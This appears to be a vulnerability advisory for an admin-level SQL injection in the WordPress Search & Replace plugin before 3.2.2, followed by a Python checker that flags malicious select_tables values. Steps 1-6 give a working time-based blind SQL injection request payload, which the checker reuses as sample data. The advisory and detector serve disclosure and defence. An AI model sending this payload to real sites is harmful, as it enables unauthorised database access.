wpexploit | Krugov Aryom | WPEX-ID:7D5B8764-C82D-4969-A707-F38B63BCADCA
May 23, 2024 - 12:00 a.m.

Search & Replace < 3.2.2 - Admin+ SQL injection

search & replace admin+ sql injection poc june 06 2024 exploit update

AI Score: 7.5 (Confidence: Low)
EPSS: 0.001 (Percentile: 19.5%)

Description: The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks (such as within a multi-site network).

1. Go to the Tools parameter
2. Select Search & Replace
3. Click "Do Search & Replace"
4. Change the parameters and intercept the request
5. Put a vulnerable SQL query in the request, such as the following: `search=123&replace=1&csv=1&select_tables%5B%5D=(SELECT+9255+FROM+(SELECT(SLEEP(1-(IF(44=44,0,5)))))cCQl)&export_or_save=1&action=search-replace&search-submit=123123"asdasd=''&insr_nonce=0590310227&_wp_http_referer=%2Fwp-admin%2Ftools.php%3Fpage%3Dsearch-replace`
6. Notice that the response is delayed by double the number of seconds given in the SLEEP(x-) value you insert.
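
A defender-side check for the request shown in step 5, added here as an example (not code from the plugin or the advisory): it parses a form-encoded POST body and flags `select_tables` values that are not bare table names. The function names, the identifier pattern and the `req-2` to `req-4` sample bodies are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumption: a legitimate value is a bare table name such as "wp_posts"
# (unquoted MySQL identifier characters, at most 64 long).
TABLE_NAME = re.compile(r"[A-Za-z0-9_$]{1,64}")
# PHP treats select_tables[], select_tables[0], ... as the same array.
TABLE_KEY = re.compile(r"select_tables(\[[^\]]*\])?")


def suspicious_tables(body: str) -> list[str]:
    """Return select_tables values in a form body that are not bare table names."""
    flagged = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        if TABLE_KEY.fullmatch(key) and not TABLE_NAME.fullmatch(value):
            flagged.append(value)
    return flagged


def flag_requests(requests: dict[str, str]) -> dict[str, list[str]]:
    """Map request id -> offending values, for search-replace submissions only."""
    hits = {}
    for req_id, body in requests.items():
        fields = dict(parse_qsl(body, keep_blank_values=True))
        if fields.get("action") != "search-replace":
            continue
        bad = suspicious_tables(body)
        if bad:
            hits[req_id] = bad
    return hits


# Request body from step 5 of the advisory (shortened to the relevant fields).
ADVISORY_BODY = (
    "search=123&replace=1&csv=1"
    "&select_tables%5B%5D=(SELECT+9255+FROM+(SELECT(SLEEP(1-(IF(44=44,0,5)))))cCQl)"
    "&export_or_save=1&action=search-replace"
)
# Constructed samples: a normal submission, an indexed-key variant, another action.
SAMPLES = {
    "req-1": ADVISORY_BODY,
    "req-2": "search=a&replace=b&select_tables%5B%5D=wp_posts&action=search-replace",
    "req-3": "select_tables%5B0%5D=wp_posts+extra&action=search-replace",
    "req-4": "select_tables%5B%5D=x+y&action=other-plugin",
}

if __name__ == "__main__":
    for req_id, values in flag_requests(SAMPLES).items():
        print(req_id, values)
```

The same bare-identifier test, applied server-side against the list of tables that actually exist, is the kind of validation the description says the parameter lacks.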
